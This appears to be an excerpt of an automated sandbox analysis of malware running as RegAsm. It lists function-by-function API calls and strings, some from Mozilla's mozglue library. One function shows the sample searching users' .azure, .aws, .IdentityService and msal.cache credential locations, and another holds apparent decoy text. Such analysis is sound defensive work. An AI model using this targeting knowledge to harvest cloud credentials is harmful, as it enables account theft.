                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8046C0
                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8046CD
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C8046F1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C8046FD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                                  • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                                                                                                  • Opcode ID: fab5164305bd2faffc8ee897736872a9eb6c44dfeb0e42b05817f02988928249
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5484d9e3e55312c30a1e9c426064dbe2f05ecbf6c6c59a88c21ed032198f8a8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fab5164305bd2faffc8ee897736872a9eb6c44dfeb0e42b05817f02988928249
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A061F2B16442589EEB318F61CE49BAD7BB8EBE330CF048868E5149B641F7748944CBB0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F70E
                                                                                                                                                                                                                                                                                                  • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C83F8F9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C806390: GetCurrentThreadId.KERNEL32 ref: 6C8063D0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C806390: AcquireSRWLockExclusive.KERNEL32 ref: 6C8063DF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C806390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C80640E
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F93A
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F98A
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F990
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F994
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F716
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C7FB5E0
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F739
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F746
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F793
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C87385B,00000002,?,?,?,?,?), ref: 6C83F829
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,00000000,?), ref: 6C83F84C
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C83F866
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83FA0C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C805E8C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805E9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentThreadId.KERNEL32 ref: 6C805EAB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentThreadId.KERNEL32 ref: 6C805EB8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805ECF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C805F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C805F47
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentProcess.KERNEL32 ref: 6C805F53
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentThread.KERNEL32 ref: 6C805F5C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: GetCurrentProcess.KERNEL32 ref: 6C805F66
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C805E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C805F7E
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83F9C5
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83F9DA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Thread , xrefs: 6C83F789
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_register_thread(%s), xrefs: 6C83F71F
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C83F9A6
                                                                                                                                                                                                                                                                                                  • " attempted to re-register as ", xrefs: 6C83F858
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                                                                                                  • API String ID: 882766088-1834255612
                                                                                                                                                                                                                                                                                                  • Opcode ID: b144f098bb565951e0a034a9e7a03d0c3c3863cf87281b7892043207b8e91dbd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e12617065fb0f5a66a7e60598ce2f29203104d8fc2601ebbde3b15afd92f17b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b144f098bb565951e0a034a9e7a03d0c3c3863cf87281b7892043207b8e91dbd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 808129716043249FD731DF68C644AAE77E5EF95308F405C6DE84997B11EB30A849CBE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EE60
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EE6D
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EE92
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C83EEA5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C83EEB4
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C83EEBB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EEC7
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83EECF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: GetCurrentThreadId.KERNEL32 ref: 6C83DE73
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C804A68), ref: 6C83DE7B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C804A68), ref: 6C83DEB8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: free.MOZGLUE(00000000,?,6C804A68), ref: 6C83DEFE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C83DF38
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EF1E
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EF2B
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EF59
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EFB0
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EFBD
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83EFE1
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EFF8
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F000
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C83F02F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C83F09B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C83F0AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C83F0BE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_pause, xrefs: 6C83F008
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_stop, xrefs: 6C83EED7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                                                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                                                                                                  • API String ID: 16519850-1833026159
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b19892841027c704fbbdd56bcaf18e6cef163a4bb4ff3ae6d49d0e6df370013
                                                                                                                                                                                                                                                                                                  • Instruction ID: 96e1c7305dd6c12f97167c4ab02086ffc1a86427009205a974642e208f73f081
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b19892841027c704fbbdd56bcaf18e6cef163a4bb4ff3ae6d49d0e6df370013
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351D3316042309FDB315BA9D60C7AE3BB5EB5622CF1419B9EA1983B80FB745854C7F2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00402360 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 63stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 004023D5
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 004023F5
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 004023EB
                                                                                                                                                                                                                                                                                                  • The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs)., xrefs: 00402392
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 004023FF
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402409
                                                                                                                                                                                                                                                                                                  • At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 004023A6
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 004023C3
                                                                                                                                                                                                                                                                                                  • Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040239C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$AllocLocal
                                                                                                                                                                                                                                                                                                  • String ID: At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
                                                                                                                                                                                                                                                                                                  • API String ID: 710835760-1224611842
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c237dd6f1b96539990ba3eeedca62018b61e1602cd25107268c691226e1c1fb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 99863c25ecdbddf0739bc32edb1c4eaabd19e6c58fa290cb6cfa539598b54a40
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c237dd6f1b96539990ba3eeedca62018b61e1602cd25107268c691226e1c1fb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511083170026867C700BEAA6CA2ADDB7D59F49714FD9409BFD54E3282C9FC9C6042BD
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00417A10 Relevance: 28.6, APIs: 10, Strings: 9, Instructions: 142stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417A41
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00417A67
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00417A84
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417588
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindFirstFileA.KERNEL32(?,?), ref: 0041759F
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417AC3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00417AEC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00417B09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D4), ref: 004175DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D8), ref: 004175F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 0041761B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,0042734E), ref: 0041762A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: PathMatchSpecA.SHLWAPI(?,?), ref: 00417677
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,0156F8D8), ref: 004176A3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F0), ref: 004176B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176C3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F4), ref: 004176D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176E9
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417B48
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00417B71
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417B8E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417666
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindNextFileA.KERNEL32(000000FF,?), ref: 004177B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindClose.KERNEL32(000000FF), ref: 004177C9
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00417BCD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
